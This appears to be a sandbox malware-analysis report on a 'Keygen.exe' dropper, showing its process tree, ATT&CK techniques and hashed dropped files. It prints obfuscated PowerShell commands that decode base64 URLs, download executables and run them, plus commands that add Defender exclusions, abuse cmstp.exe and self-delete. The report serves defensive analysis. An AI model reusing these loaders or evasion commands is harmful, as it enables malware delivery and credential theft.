              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
              4⤵
              • Blocklisted process makes network request
              • Loads dropped DLL
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:780
              • C:\Users\Public\tnw.exe
                "C:\Users\Public\tnw.exe"
                5⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of AdjustPrivilegeToken
                PID:2532
                • C:\Windows\SysWOW64\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
                  6⤵
                  • Loads dropped DLL
                  PID:944
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                    7⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of SetThreadContext
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1204
                    • C:\Windows\SysWOW64\WScript.exe
                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
                      8⤵
                      • Loads dropped DLL
                      PID:2184
                      • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                        "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                        9⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of SetThreadContext
                        • Suspicious use of AdjustPrivilegeToken
                        PID:808
                        • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                          "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                          10⤵
                          • Executes dropped EXE
                          PID:1560
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                      "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                      8⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Checks processor information in registry
                      PID:2308
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c taskkill /pid 2308 & erase C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe & RD /S /Q C:\\ProgramData\\395950266022587\\* & exit
                        9⤵
                          PID:832
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /pid 2308
                            10⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1684
                  • C:\Users\Public\tnw.exe
                    "C:\Users\Public\tnw.exe"
                    6⤵
                    • Executes dropped EXE
                    PID:2676
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\A351.tmp\b1.hta"
              3⤵
              • Modifies Internet Explorer settings
              • Suspicious use of WriteProcessMemory
              PID:2032
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1468
            • C:\Windows\SysWOW64\timeout.exe
              timeout 2
              3⤵
              • Delays execution with timeout.exe
              PID:1992
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\A351.tmp\ba.hta"
              3⤵
              • Modifies Internet Explorer settings
              • Suspicious use of WriteProcessMemory
              PID:1432
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                4⤵
                • Blocklisted process makes network request
                • Loads dropped DLL
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1504
                • C:\Users\Public\bjc.exe
                  "C:\Users\Public\bjc.exe"
                  5⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: MapViewOfSection
                  • Suspicious use of SetWindowsHookEx
                  PID:2596
                  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                    6⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of SetThreadContext
                    • Suspicious behavior: MapViewOfSection
                    • Suspicious use of SetWindowsHookEx
                    PID:2700
                    • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                      7⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Checks processor information in registry
                      PID:2904
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c taskkill /pid 2904 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\728935092572548\\* & exit
                        8⤵
                          PID:2656
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /pid 2904
                            9⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1328
                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                      6⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of SetThreadContext
                      • Suspicious behavior: MapViewOfSection
                      • Suspicious use of SetWindowsHookEx
                      PID:2720
                      • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                        "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                        7⤵
                        • Executes dropped EXE
                        PID:2928
                    • C:\Users\Public\bjc.exe
                      "C:\Users\Public\bjc.exe"
                      6⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Drops desktop.ini file(s)
                      • Modifies system certificate store
                      PID:2784
                      • C:\Users\Admin\AppData\Local\Temp\28WSxW7twO.exe
                        "C:\Users\Admin\AppData\Local\Temp\28WSxW7twO.exe"
                        7⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2284
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                          "Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Local\Temp\28WSxW7twO.exe"'
                          8⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2680
                      • C:\Users\Admin\AppData\Local\Temp\yKU5x37DQ1.exe
                        "C:\Users\Admin\AppData\Local\Temp\yKU5x37DQ1.exe"
                        7⤵
                        • Executes dropped EXE
                        PID:2176
                        • C:\Windows\SysWOW64\Notepad.exe
                          "C:\Windows\System32\Notepad.exe"
                          8⤵
                            PID:1504
                        • C:\Users\Admin\AppData\Local\Temp\Sz8lSfNk8p.exe
                          "C:\Users\Admin\AppData\Local\Temp\Sz8lSfNk8p.exe"
                          7⤵
                          • Executes dropped EXE
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of SetWindowsHookEx
                          PID:2144
                          • \??\c:\windows\SysWOW64\cmstp.exe
                            "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\embrymsw.inf
                            8⤵
                              PID:1824
                          • C:\Users\Admin\AppData\Local\Temp\gdxq3nnTWJ.exe
                            "C:\Users\Admin\AppData\Local\Temp\gdxq3nnTWJ.exe"
                            7⤵
                            • Executes dropped EXE
                            • Windows security modification
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2768
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              "powershell" Get-MpPreference -verbose
                              8⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1700
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\bjc.exe"
                            7⤵
                              PID:2808
                              • C:\Windows\SysWOW64\timeout.exe
                                timeout /T 10 /NOBREAK
                                8⤵
                                • Delays execution with timeout.exe
                                PID:2528
                    • C:\Windows\SysWOW64\mshta.exe
                      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\A351.tmp\ba1.hta"
                      3⤵
                      • Modifies Internet Explorer settings
                      • Suspicious use of WriteProcessMemory
                      PID:1232
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                        4⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1916

                Network

                MITRE ATT&CK Matrix ATT&CK v6

                Persistence

                Modify Existing Service

                1
                T1031

                Defense Evasion

                Modify Registry

                4
                T1112

                Disabling Security Tools

                2
                T1089

                Install Root Certificate

                1
                T1130

                Credential Access

                Credentials in Files

                3
                T1081

                Discovery

                Query Registry

                2
                T1012

                System Information Discovery

                2
                T1082

                Collection

                Data from Local System

                3
                T1005

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\ProgramData\MSVCP140.dll
                • C:\ProgramData\VCRUNTIME140.dll
                • C:\ProgramData\freebl3.dll
                • C:\ProgramData\mozglue.dll
                • C:\ProgramData\mozglue.dll
                • C:\ProgramData\msvcp140.dll
                • C:\ProgramData\nss3.dll
                  MD5

                  bfac4e3c5908856ba17d41edcd455a51

                  SHA1

                  8eec7e888767aa9e4cca8ff246eb2aacb9170428

                  SHA256

                  e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                  SHA512

                  2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                • C:\ProgramData\nss3.dll
                  MD5

                  bfac4e3c5908856ba17d41edcd455a51

                  SHA1

                  8eec7e888767aa9e4cca8ff246eb2aacb9170428

                  SHA256

                  e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                  SHA512

                  2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                • C:\ProgramData\softokn3.dll
                • C:\ProgramData\sqlite3.dll
                • C:\ProgramData\sqlite3.dll
                • C:\ProgramData\vcruntime140.dll
                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1a1733a9-c78a-41f9-ba49-7e78bc3e775b
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2c0c5b2c-bba7-4553-9e50-1dc025e4b9fa
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_478c05f3-b801-4912-91bd-47646e127596
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4fd4a7fe-82f5-41e4-888c-1b7eac83ece7
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6f87daa4-b2e3-435f-94b4-03287d5edc91
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6fd0f5f7-1793-49e3-8e18-26933c63f69d
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a2ebb337-3027-47ef-8098-8d2e9f7615cf
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ac02e1ec-7e19-4e0d-ae92-5626a965f544
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ca37ad88-4ce8-48e7-a2ed-ec10658dba29
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e10aa6dc-f3ff-45e4-9eec-4fef42847693
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e1dd9aab-0fd1-4532-ba7f-00569c2741ef
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Temp\28WSxW7twO.exe
                • C:\Users\Admin\AppData\Local\Temp\28WSxW7twO.exe
                • C:\Users\Admin\AppData\Local\Temp\A351.tmp\Keygen.exe
                • C:\Users\Admin\AppData\Local\Temp\A351.tmp\Keygen.exe
                • C:\Users\Admin\AppData\Local\Temp\A351.tmp\b.hta
                • C:\Users\Admin\AppData\Local\Temp\A351.tmp\b1.hta
                • C:\Users\Admin\AppData\Local\Temp\A351.tmp\ba.hta
                • C:\Users\Admin\AppData\Local\Temp\A351.tmp\ba1.hta
                • C:\Users\Admin\AppData\Local\Temp\A351.tmp\m.hta
                • C:\Users\Admin\AppData\Local\Temp\A351.tmp\m1.hta
                • C:\Users\Admin\AppData\Local\Temp\A351.tmp\start.bat
                • C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs
                • C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs
                • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs
                • C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs
                • C:\Users\Admin\AppData\Local\Temp\Sz8lSfNk8p.exe
                • C:\Users\Admin\AppData\Local\Temp\Sz8lSfNk8p.exe
                • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                • C:\Users\Admin\AppData\Local\Temp\gdxq3nnTWJ.exe
                • C:\Users\Admin\AppData\Local\Temp\gdxq3nnTWJ.exe
                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                • C:\Users\Admin\AppData\Local\Temp\yKU5x37DQ1.exe
                  MD5

                  013db621a3351e3fb049efd2ccad79ff

                  SHA1

                  a23394ea54dbc5342a77938a2c285ee616185560

                  SHA256

                  df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                  SHA512

                  1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                • C:\Users\Public\arj.exe
                • C:\Users\Public\arj.exe
                • C:\Users\Public\arj.exe
                • C:\Users\Public\bjc.exe
                • C:\Users\Public\bjc.exe
                • C:\Users\Public\bjc.exe
                • C:\Users\Public\tnw.exe
                • C:\Users\Public\tnw.exe
                • C:\Users\Public\tnw.exe
                • C:\Users\Public\tnw.exe
                • C:\Users\Public\tnw.exe
                • C:\Windows\temp\embrymsw.inf
                • \??\PIPE\srvsvc
                • \??\PIPE\srvsvc
                • \ProgramData\mozglue.dll
                • \ProgramData\mozglue.dll
                • \ProgramData\mozglue.dll
                • \ProgramData\mozglue.dll
                • \ProgramData\msvcp140.dll
                • \ProgramData\msvcp140.dll
                • \ProgramData\msvcp140.dll
                • \ProgramData\msvcp140.dll
                • \ProgramData\nss3.dll
                  MD5

                  bfac4e3c5908856ba17d41edcd455a51

                  SHA1

                  8eec7e888767aa9e4cca8ff246eb2aacb9170428

                  SHA256

                  e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                  SHA512

                  2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                • \ProgramData\nss3.dll
                  MD5

                  bfac4e3c5908856ba17d41edcd455a51

                  SHA1

                  8eec7e888767aa9e4cca8ff246eb2aacb9170428

                  SHA256

                  e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                  SHA512

                  2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                • \ProgramData\nss3.dll
                  MD5

                  bfac4e3c5908856ba17d41edcd455a51

                  SHA1

                  8eec7e888767aa9e4cca8ff246eb2aacb9170428

                  SHA256

                  e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                  SHA512

                  2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                • \ProgramData\nss3.dll
                  MD5

                  bfac4e3c5908856ba17d41edcd455a51

                  SHA1

                  8eec7e888767aa9e4cca8ff246eb2aacb9170428

                  SHA256

                  e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                  SHA512

                  2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                • \ProgramData\sqlite3.dll
                • \ProgramData\sqlite3.dll
                • \ProgramData\sqlite3.dll
                • \ProgramData\sqlite3.dll
                • \ProgramData\vcruntime140.dll
                • \ProgramData\vcruntime140.dll
                • \ProgramData\vcruntime140.dll
                • \ProgramData\vcruntime140.dll
                • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll
                • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\msvcp140.dll
                • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll
                  MD5

                  02cc7b8ee30056d5912de54f1bdfc219

                  SHA1

                  a6923da95705fb81e368ae48f93d28522ef552fb

                  SHA256

                  1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

                  SHA512

                  0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

                • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
                • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\vcruntime140.dll
                • \Users\Admin\AppData\LocalLow\sqlite3.dll
